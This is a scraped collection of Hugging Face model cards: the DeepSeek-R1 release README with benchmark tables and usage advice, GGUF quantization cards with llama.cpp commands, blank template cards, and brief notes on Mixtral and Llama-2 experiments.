<a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;">
<img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/>
</a>
<a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;">
<img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/>
</a>
</div>
<div align="center" style="line-height: 1;">
<a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;">
<img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/>
</a>
</div>
<p align="center">
<a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a>
</p>
## 1. Introduction
We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1.
DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning.
With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors.
However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance,
we introduce DeepSeek-R1, which incorporates cold-start data before RL.
DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks.
To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models.
**NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.**
<p align="center">
<img width="80%" src="figures/benchmark.jpg">
</p>
## 2. Model Summary
---
**Post-Training: Large-Scale Reinforcement Learning on the Base Model**
- We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area.
- We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities.
We believe the pipeline will benefit the industry by creating better models.
---
**Distillation: Smaller Models Can Be Powerful Too**
- We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future.
- Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community.
## 3. Model Downloads
### DeepSeek-R1 Models
<div align="center">
| **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** |
| :------------: | :------------: | :------------: | :------------: | :------------: |
| DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) |
| DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) |
</div>
DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base.
For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository.
### DeepSeek-R1-Distill Models
<div align="center">
| **Model** | **Base Model** | **Download** |
| :------------: | :------------: | :------------: |
| DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) |
| DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) |
| DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) |
| DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) |
|DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) |
| DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) |
</div>
DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1.
We slightly change their configs and tokenizers. Please use our setting to run these models.
## 4. Evaluation Results
### DeepSeek-R1-Evaluation
For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1.
<div align="center">
| Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 |
|----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------|
| | Architecture | - | - | MoE | - | - | MoE |
| | # Activated Params | - | - | 37B | - | - | 37B |
| | # Total Params | - | - | 671B | - | - | 671B |
| English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 |
| | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** |
| | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** |
| | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** |
| | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 |
| | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 |
| | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 |
| | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** |
| | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** |
| | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** |
| Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** |
| | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 |
| | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 |
| | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 |
| | Aider-Polyglot (Acc.) | 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 |
| Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** |
| | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** |
| | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** |
| Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** |
| | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** |
| | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 |
</div>
### Distilled Model Evaluation
<div align="center">
| Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating |
|------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------|
| GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 |
| Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 |
| o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** |
| QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 |
| DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 |
| DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 |
| DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 |
| DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 |
| DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 |
| DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 |
</div>
## 5. Chat Website & API Platform
You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink"
We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/)
## 6. How to Run Locally
### DeepSeek-R1 Models
Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally.
**NOTE: Hugging Face's Transformers has not been directly supported yet.**
### DeepSeek-R1-Distill Models
DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models.
For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm):
```shell
vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager
```
You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang)
```bash
python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2
```
### Usage Recommendations
**We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:**
1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs.
2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.**
3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}."
4. When evaluating model performance, it is recommended to conduct multiple tests and average the results.
Additionally, we have observed that the DeepSeek-R1 series models tend to bypass thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance.
**To ensure that the model engages in thorough reasoning, we recommend enforcing the model to initiate its response with "\<think\>\n" at the beginning of every output.**
## 7. License
This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE).
DeepSeek-R1 series support commercial use, allow for any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that:
- DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and now finetuned with 800k samples curated with DeepSeek-R1.
- DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE).
- DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE).
## 8. Citation
```
@misc{deepseekai2025deepseekr1incentivizingreasoningcapability,
title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning},
author={DeepSeek-AI},
year={2025},
eprint={2501.12948},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2501.12948},
}
```
## 9. Contact
If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
|
Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF | Bouquets | 2025-05-30T07:55:31Z | 5 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B",
"base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B",
"license:mit",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-05-30T07:55:03Z | ---
license: mit
library_name: transformers
tags:
- llama-cpp
- gguf-my-repo
base_model: deepseek-ai/DeepSeek-R1-0528-Qwen3-8B
---
# Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF
This model was converted to GGUF format from [`deepseek-ai/DeepSeek-R1-0528-Qwen3-8B`](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048
```
|
nikmandava/albert-term-scorer-base-v1 | nikmandava | 2025-05-30T07:55:15Z | 1 | 0 | transformers | [
"transformers",
"safetensors",
"albert",
"feature-extraction",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | feature-extraction | 2025-05-30T07:55:05Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
TheMindExpansionNetwork/M1NDB0T-DR34M3R-R1-0528-Qwen3-8B | TheMindExpansionNetwork | 2025-05-30T07:54:19Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"llama-factory",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T07:11:09Z | ---
library_name: transformers
tags:
- llama-factory
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF | Theros | 2025-05-30T07:50:53Z | 1 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"llama-cpp",
"gguf-my-repo",
"base_model:SvalTek/Gemma3-ColdBrew-Lorenz",
"base_model:quantized:SvalTek/Gemma3-ColdBrew-Lorenz",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-05-30T07:50:18Z | ---
base_model: SvalTek/Gemma3-ColdBrew-Lorenz
library_name: transformers
tags:
- mergekit
- merge
- llama-cpp
- gguf-my-repo
---
# Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF
This model was converted to GGUF format from [`SvalTek/Gemma3-ColdBrew-Lorenz`](https://huggingface.co/SvalTek/Gemma3-ColdBrew-Lorenz) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/SvalTek/Gemma3-ColdBrew-Lorenz) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF --hf-file gemma3-coldbrew-lorenz-q5_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF --hf-file gemma3-coldbrew-lorenz-q5_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF --hf-file gemma3-coldbrew-lorenz-q5_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Theros/Gemma3-ColdBrew-Lorenz-Q5_K_M-GGUF --hf-file gemma3-coldbrew-lorenz-q5_k_m.gguf -c 2048
```
|
2yunadaaa/qwen2.5-7B-instruct-3kingdoms-augmented | 2yunadaaa | 2025-05-30T07:48:58Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T07:41:41Z | ---
base_model: unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2
- trl
- sft
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** 2yunadaaa
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen2.5-7b-instruct-unsloth-bnb-4bit
This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
tooba248/cross-modal-retriever | tooba248 | 2025-05-30T07:47:14Z | 0 | 0 | null | [
"region:us"
] | null | 2025-05-29T23:18:06Z | # Cross-Modal Retriever (Flickr30k Test)
This app evaluates a fine-tuned CLIP model using the full test split from Flickr30k.
- Upload an image to retrieve its best-matching caption.
- Enter a caption to retrieve the closest image. |
chargoddard/mixtralmerge-8x7B-rebalanced-test | chargoddard | 2025-05-30T07:31:12Z | 13 | 0 | transformers | [
"transformers",
"pytorch",
"safetensors",
"mixtral",
"text-generation",
"merge",
"mergekit",
"conversational",
"dataset:Open-Orca/SlimOrca",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-04T07:49:22Z | ---
license: cc-by-nc-4.0
tags:
- merge
- mergekit
datasets:
- Open-Orca/SlimOrca
---
This is a dumb experiment - don't expect it to be good!
I merged a few Mixtral models together then tuned *only the routing parameters*. There was a pretty steep drop in loss with only a bit of training - went from ~0.99 to ~.7 over about ten million tokens.
I'm hoping this after-the-fact balancing will have reduced some of the nasty behavior typical of current tunes. But maybe it just made it even dumber! We'll see.
Uses ChatML format.
Will update with more details if it turns out promising. |
chargoddard/llama-2-34b-uncode | chargoddard | 2025-05-30T07:31:11Z | 11 | 5 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"dataset:the_pile_books3",
"dataset:togethercomputer/RedPajama-Data-1T-Sample",
"license:llama2",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-08-27T09:11:25Z | ---
license: llama2
datasets:
- the_pile_books3
- togethercomputer/RedPajama-Data-1T-Sample
language:
- en
---
very wip experiment.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_chargoddard__llama-2-34b-uncode)
| Metric | Value |
|-----------------------|---------------------------|
| Avg. | 36.2 |
| ARC (25-shot) | 39.51 |
| HellaSwag (10-shot) | 33.9 |
| MMLU (5-shot) | 38.49 |
| TruthfulQA (0-shot) | 40.94 |
| Winogrande (5-shot) | 74.35 |
| GSM8K (5-shot) | 20.77 |
| DROP (3-shot) | 5.43 |
|
tonglaovn/llama3_8B_finetuned_sport_tva | tonglaovn | 2025-05-30T07:28:24Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"bitsandbytes",
"region:us"
] | text-generation | 2025-05-30T07:26:52Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
